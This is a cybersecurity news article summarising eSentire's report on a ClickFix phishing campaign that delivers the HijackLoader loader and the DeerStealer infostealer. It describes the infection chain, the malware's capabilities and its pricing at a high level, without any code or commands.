A new wave of cyber-attacks involving HijackLoader and DeerStealer has been observed by cybersecurity researchers using phishing tactics to lure victims into executing malicious commands.
According to the eSentire’s Threat Response Unit (TRU), which discovered the campaign, it uses ClickFix as the initial access vector.
Victims are redirected to a phishing page that prompts them to run a PowerShell command via the Windows Run prompt. This command downloads an installer named now.msi, which launches a chain of actions culminating in the execution of HijackLoader and release of the DeerStealer payload.
eSentire said HijackLoader has been active since 2023 and is known for its use of steganography, specifically hiding configuration data in PNG images.
Once executed, the loader exploits legitimate binaries to run unsigned malicious code, ultimately injecting DeerStealer into memory.
DeerStealer’s Expansive Theft Capabilities
DeerStealer, also marketed as XFiles Spyware on dark-web forums by a user named LuciferXfiles, is a subscription-based infostealer with features that go well beyond basic credential theft.
The malware:
-
Extracts data from over 50 web browsers
-
Hijacks 14+ cryptocurrency wallet types via clipboard monitoring
-
Harvests credentials from messengers, FTP, VPN, email and gaming clients
-
Includes hidden VNC for stealthy remote access
-
Uses encrypted HTTPS channels for command-and-control (C2) communication
The malware also features modular obfuscation and virtual machines to decrypt strings, hindering traditional analysis techniques.
Read more on malware loader techniques: CoffeeLoader Malware Loader Linked to SmokeLoader Operations
Command Line Trickery
The attack begins with the user unwittingly running an encoded command that fetches the installer.
Though the installer uses a signed binary from COMODO, it loads a manipulated DLL to hijack execution. This altered DLL eventually decrypts the next stage, which injects DeerStealer into another legitimate process.
Despite public tools available to decode HijackLoader’s configuration, attackers continue using the same methods, indicating either ignorance or disregard for detection risks.
Expanding Threat, Evolving Tools
eSentire warned that DeerStealer is continuously evolving, with upcoming features to include MacOS support, AI-driven enhancements and additional client targets.
Threat actors who subscribe to higher pricing tiers – up to $3000 per month – receive extras such as re-encryption, payload signing and advanced customization.
As these tools become more sophisticated, defenders must remain alert.
eSentire’s TRU recommends continuous threat monitoring and updating endpoint protection mechanisms to detect emerging loaders and stealers before any damage is done.